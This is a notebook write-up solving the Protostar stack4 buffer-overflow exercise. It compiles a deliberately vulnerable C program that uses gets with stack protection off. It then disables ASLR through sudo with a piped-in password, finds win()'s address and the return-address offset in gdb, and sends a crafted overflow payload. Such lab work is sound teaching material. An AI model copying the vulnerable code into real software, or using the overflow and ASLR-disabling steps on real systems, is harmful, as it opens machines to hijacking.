# protostar/stack4 solution

https://exploit.education/protostar/stack-four/

## compile source code

In [1]:
import os

src = r"""

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
  fflush(stdout); // patch to allow redirect output (to notebook) to receive prints with seg faults.
}

int main(int argc, char **argv)
{
  char buffer[64];
  
  gets(buffer);
}

"""

with open("src.c", "w") as f:
    f.write(src)

# 32bit. disable warnings. disable stack protection. Align stack to DWORDs.
_ = os.system('gcc src.c -m32 -w -fno-stack-protector -mpreferred-stack-boundary=2 -o prog') 

/usr/bin/ld: /tmp/ccDpycFA.o: in function `main':
src.c:(.text+0x4d): warning: the `gets' function is dangerous and should not be used.


## solution

First, we have to find the virtual address of win() function. We can achieve it using gbd.

Note that ASLR must be disabled before invoking the application.

In [2]:
# Gain root privileges for Kali Linux & Disable ASLR.
import os
_ = os.system('''
echo "kali" | sudo -S -i
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
''')

# win() virtual address without ASLR.
_ = os.system("gdb -batch -ex 'file prog' -ex 'run' -ex 'info address win' | egrep -o '\"win\".*0x[0-9abcdefABCDEF]{4,8}'")

[sudo] password for kali: 

0
"win" is at 0x56556211


Passing argument string with length > 64 will cause a buffer overflow.  We need to find the location of saved ret address of main and fill it with the virtual address of win() as found above.

Let's disassemble main function:

In [3]:
import os
_ = os.system("gdb -batch -ex 'file prog' -ex 'run' -ex 'set disassembly-flavor intel' -ex 'disassemble main'")

[Inferior 1 (process 29488) exited normally]
Dump of assembler code for function main:
   0x56556246 <+0>:	push   ebp
   0x56556247 <+1>:	mov    ebp,esp
   0x56556249 <+3>:	push   ebx
   0x5655624a <+4>:	sub    esp,0x40
   0x5655624d <+7>:	call   0x5655626f <__x86.get_pc_thunk.ax>
   0x56556252 <+12>:	add    eax,0x2dae
   0x56556257 <+17>:	lea    edx,[ebp-0x44]
   0x5655625a <+20>:	push   edx
   0x5655625b <+21>:	mov    ebx,eax
   0x5655625d <+23>:	call   0x56556050 <gets@plt>
   0x56556262 <+28>:	add    esp,0x4
   0x56556265 <+31>:	mov    eax,0x0
   0x5655626a <+36>:	mov    ebx,DWORD PTR [ebp-0x4]
   0x5655626d <+39>:	leave  
   0x5655626e <+40>:	ret    
End of assembler dump.


We can note that 0x40 (64) bytes are reserved on the stack for local params (`sub esp,0x40`) which is our buffer.

If we put a breakpoint after `lea edx,[ebp-0x44]` at `0x5655625a` we will find the the buffer's address on the stack. In the same run, the next breakpoint would be at `ret` command. This will allow us to see how many bytes we need to override from the buffer to the return address.

In [4]:
import os
#_ = os.system("gdb -batch -ex 'file prog' -ex 'b *0x5655626e' -ex 'run' -ex 'x/120x $sp-100'")
_ = os.system(" \
gdb -batch -ex 'file prog' -ex 'b *0x5655625d' -ex 'b *0x5655626e'  -ex 'run' -ex 'info registers edx' \
-ex 'c' -ex 'info registers esp' \
")

Breakpoint 1 at 0x5655625d
Breakpoint 2 at 0x5655626e

Breakpoint 1, 0x5655625d in main ()
edx            0xffffd614          -10732

Breakpoint 2, 0x5655626e in main ()
esp            0xffffd65c          0xffffd65c


We can see that the offset between the value in `esp` and the value in `edx` is 0x48 (72) bytes. This means that we have to fill 72 - 64 = 8 bytes before we write our return address.

In [5]:
import subprocess
from subprocess import PIPE
import struct

p = subprocess.Popen(['./prog'], stdin=PIPE, stdout=PIPE)
res, err = p.communicate( b'A'*64 + b'B'*8 + struct.pack("<I", 0x56556211) )
print(res.decode("utf-8"))

code flow successfully changed



In [6]:
# Gain root privileges for Kali Linux & RE-Enable ASLR.
import os
_ = os.system('''
echo "kali" | sudo -S -i
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
''')

2


[sudo] password for kali: 

In [7]:
import sys
print("Python version")
print (sys.version)

Python version
3.9.10 (main, Jan 16 2022, 17:12:18) 
[GCC 11.2.0]
